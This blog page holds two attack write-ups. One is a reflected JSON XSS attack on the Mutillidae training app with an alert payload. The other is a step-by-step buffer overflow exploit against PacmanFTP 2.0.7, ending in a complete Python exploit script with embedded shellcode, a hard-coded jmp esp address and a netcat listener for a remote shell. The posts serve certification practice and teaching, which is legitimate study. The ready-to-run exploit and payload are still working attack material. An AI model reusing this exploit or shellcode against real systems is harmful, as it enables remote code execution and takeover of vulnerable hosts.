Wednesday, October 17, 2018

Json Reflective XSS Attack


I'm currently on a mission to solve every challenge on every level with Mutillidae Vulnerable web application. This post is about JSON XSS attacks. But before we jump into the JSON attack let begin with a quick background on JSON.  JSON (Javascript Object Notation) is just a form of light weight data exchange, many developers have replaced Xml with JSON due to its lightweight nature. Ok we got the intro out of the way lets get into some JSON. 


1. Fire up the Mutillidae II application i currently have LAB26 VM running which includes some awesome vulnerable web applications that you can play around with and learn some good web app fu :) you can download Lab26 from the following url https://www.vulnhub.com/entry/lab26-11,190/

We are going to attack the Pen Test Tool Application.




2. When Selecting the Pen Test Tool from the drop down menu which in our case is the Show All option Make sure that Burp Suite is up and running with Intercept turned on.  So you can intercept the request.




3. As you can see this is a Post request. with in the POST request you can see that the ToolID is where we provided our input when the Show All drop down was selected.



4. So I've changed the ToolID from the ID number to bsdbandit as my input into the pen test tool lookup application and then sent the request on it's way.





4. As we can see my bsdbandit input has landed within the JSON of the application response. This is where understanding how json works and what characters are needed in order to break out of the JSON syntax and inject your own javascript payload. Remember when dealing with XSS its all about  where your input lands and what characters are available  weather or not they are encoded. In this Case since im working with JSON im  going to need the following characters in order to break out:  "}();






  5. I have replaced my bsdbandit input with the following payload:    
      "}});alert(7);//  and sent the POST request method over to the pen test tool application.




6. It looks the web app has run our payload. As you can see the application does not do any input validation and output encoding the application.





7. And Tada our alert pops up  :)










Sunday, October 14, 2018

Exploiting Pacman FTP using Buffer Overflow Attack

At the current time i'm currently working on my OSCE certification so i decided to go back and work on my Buffer Overflow skills in preparation for the OSCE exam. I downloaded pacmanftp 2.0.7 from exploitdb https://www.exploit-db.com/exploits/26471/ which is known to be vulnerable to buffer overflow attack.  During this tutorial im going to take you through the exploitation process step by step.  The First Step i took was to fuzz the ftp connections using a custom python ftp fuzzing script. below is an example of the code that i used to fuzz the application.
































After running the fuzzer against the Pacman Ftp application the application crashed at  the 2100 attack string and then i received the following output from the crashed application


This tells me that i was able to over write the EIP register with 4 A's. The next step for me was to create a pattern string. This can be accomplished with metasploit by running the following command
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100. if you are not sure about the path of a command you can always using the locate command: for example  locate pattern_create.rb.




After running the pattern_create.rb script i got the following output




The next step taken was to plug this string into my python fuzzer script and run it against the Pacman Application. I also want to note that you must detach and restart the Pacman FTP Application and then reattach to the Pacman ftp process.




Next Step is to get the exact offset, In order to do that we need to run the fuzzer script with the string pattern that was generated by the pattern_create.rb script. After running the script i received the following output




Notice that the EIP register has the following value of 43376F43. This value will need to be used when running the pattern_offset.rb -q 43376F43  script.





Now that we know the offset is 2001, We  now need to verify that we can over write the EIP register with some B's and C's  so we plug in the 2001 offset into the fuzzer script and run it




After running the Fuzzer script with the offset i got the following output.



As you can see i was able to overwrite the EIP register with 4 B's. This tells me that i now have total control over the EIP register. Now we can get into the fun part lets start building the exploit. First we start off by checking for bad characters.




in this case the bad characters where \x00 \x0a \x0d. after verifying all of the bad characters its now time to check to see what modules were associated with the Pacman FTP application. this is where mona comes in. mona is a python based module that can be installed on immunity debugger. mona.py can be downloaded from https://github.com/corelan/mona  the mona manual can be downloaded from the following url:
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
in order to check for the modules associated with the application, you need to run the following command. !mona modules















After looking through the loaded modules i decided to go with using the SHELL32.dll b/c it did not have any ASLR protection which is a great thing for hackers :). The next thing i needed to do was to figure out the optcode for jmp esp. i was able to accomplish this by running the nasm_shell.rb command.




now that i have the opcode for jmp esp  which is FFE4 or in our use case \xff\xe4. we can instruct mona to search for the opcode using the following command.





After locating the address with the jmp esp opcode which in this case was  0x7cb41020
it was now time to generate some shell code and then plugging both the shell code and jmp esp into my exploit. i  generated the shell code using the following command.







this is my final version of my exploit


import sys, socket, time

# Use in the form "python fuzzer.py  "

host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user

buf =  ""
buf += "\xda\xc0\xbb\xd8\xf0\xed\x67\xd9\x74\x24\xf4\x5e\x29"
buf += "\xc9\xb1\x52\x31\x5e\x17\x03\x5e\x17\x83\x36\x0c\x0f"
buf += "\x92\x3a\x05\x52\x5d\xc2\xd6\x33\xd7\x27\xe7\x73\x83"
buf += "\x2c\x58\x44\xc7\x60\x55\x2f\x85\x90\xee\x5d\x02\x97"
buf += "\x47\xeb\x74\x96\x58\x40\x44\xb9\xda\x9b\x99\x19\xe2"
buf += "\x53\xec\x58\x23\x89\x1d\x08\xfc\xc5\xb0\xbc\x89\x90"
buf += "\x08\x37\xc1\x35\x09\xa4\x92\x34\x38\x7b\xa8\x6e\x9a"
buf += "\x7a\x7d\x1b\x93\x64\x62\x26\x6d\x1f\x50\xdc\x6c\xc9"
buf += "\xa8\x1d\xc2\x34\x05\xec\x1a\x71\xa2\x0f\x69\x8b\xd0"
buf += "\xb2\x6a\x48\xaa\x68\xfe\x4a\x0c\xfa\x58\xb6\xac\x2f"
buf += "\x3e\x3d\xa2\x84\x34\x19\xa7\x1b\x98\x12\xd3\x90\x1f"
buf += "\xf4\x55\xe2\x3b\xd0\x3e\xb0\x22\x41\x9b\x17\x5a\x91"
buf += "\x44\xc7\xfe\xda\x69\x1c\x73\x81\xe5\xd1\xbe\x39\xf6"
buf += "\x7d\xc8\x4a\xc4\x22\x62\xc4\x64\xaa\xac\x13\x8a\x81"
buf += "\x09\x8b\x75\x2a\x6a\x82\xb1\x7e\x3a\xbc\x10\xff\xd1"
buf += "\x3c\x9c\x2a\x75\x6c\x32\x85\x36\xdc\xf2\x75\xdf\x36"
buf += "\xfd\xaa\xff\x39\xd7\xc2\x6a\xc0\xb0\x2c\xc2\x9a\x26"
buf += "\xc5\x11\x1a\xb2\xa6\x9f\xfc\xd6\xd8\xc9\x57\x4f\x40"
buf += "\x50\x23\xee\x8d\x4e\x4e\x30\x05\x7d\xaf\xff\xee\x08"
buf += "\xa3\x68\x1f\x47\x99\x3f\x20\x7d\xb5\xdc\xb3\x1a\x45"
buf += "\xaa\xaf\xb4\x12\xfb\x1e\xcd\xf6\x11\x38\x67\xe4\xeb"
buf += "\xdc\x40\xac\x37\x1d\x4e\x2d\xb5\x19\x74\x3d\x03\xa1"
buf += "\x30\x69\xdb\xf4\xee\xc7\x9d\xae\x40\xb1\x77\x1c\x0b"
buf += "\x55\x01\x6e\x8c\x23\x0e\xbb\x7a\xcb\xbf\x12\x3b\xf4"
buf += "\x70\xf3\xcb\x8d\x6c\x63\x33\x44\x35\x83\xd6\x4c\x40"
buf += "\x2c\x4f\x05\xe9\x31\x70\xf0\x2e\x4c\xf3\xf0\xce\xab"
buf += "\xeb\x71\xca\xf0\xab\x6a\xa6\x69\x5e\x8c\x15\x89\x4b"

jmpesp = '\x20\x10\xb4\x7c'

nops = '\x90' * 20


pattern = 'A' *2001 + jmpesp + nops + buf

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host, port)) # Connect to user supplied port and IP address
client.recv(1024) # Recieve FTP Banner
client.send("USER" + pattern) # Send the user command with a variable length name
client.close() # Close the Connection


Next i setup netcat listener on my box using the following command nc -nvlp 5555. After running the my exploit:


I was able to obtain a shell on the box running Pacman FTP exploit.




Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques when it comes to attacking Active Directory En...